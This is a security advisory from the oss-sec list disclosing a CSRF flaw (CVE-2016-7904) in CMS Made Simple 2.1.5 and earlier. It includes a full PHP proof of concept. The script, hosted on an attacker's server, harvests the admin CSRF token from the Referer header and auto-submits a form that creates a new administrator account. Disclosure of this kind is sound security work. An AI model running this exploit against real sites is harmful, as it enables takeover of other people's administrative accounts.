oss-sec mailing list archives
CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
From: "Hongkun Zeng" <hongkun.zeng () dbappsecurity com cn>
Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF CVE: CVE-2016-7904 Discovered by: Hongkun Zeng (http://www.dbappsecurity.com.cn/) CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area. This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack. Add article and insert image with link http://attacker/csrfpoc.php, and the referer would leak the users' csrf token. POC: ``` //File: csrfpoc.php <?php session_start(); if(!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_'])) exit; if(isset($_SERVER['HTTP_REFERER'])){ $parsed_url = parse_url($_SERVER['HTTP_REFERER']); $query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : ''; parse_str("$query",$arr); if(isset($arr['_sk_'])){ $_SESSION['_sk_'] = $arr['_sk_']; } } if(!isset($_SESSION['_sk_'])) exit; ?> <form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'> <input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" /> <input type="text" name="user" value="test" /> <input type="text" name="password" value="123456" /> <input type="text" name="passwordagain" value="123456" /> <input type="text" name="firstname" value="" /> <input type="text" name="lastname" value="" /> <input type="text" name="email" value="" /> <input type="text" name="active" value="1" /> <input type="text" name="sel_groups[]" value="1" /> <input type="text" name="sel_groups[]" value="2" /> <input type="text" name="sel_groups[]" value="3" /> <input type="text" name="copyusersettings" value="-1" /> <input type="text" name="submit" value="submit" /> </form> <script> document.createElement('form').submit.call(document.getElementById('form')); </script> ``` Ref: http://dev.cmsmadesimple.org/project/changelog/5392 -- Best Regards, Hongkun Zeng --------------------------------------------------- hongkun.zeng (at) dbappsecurity.com.cn
Current thread:
- CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF Hongkun Zeng (Jan 15)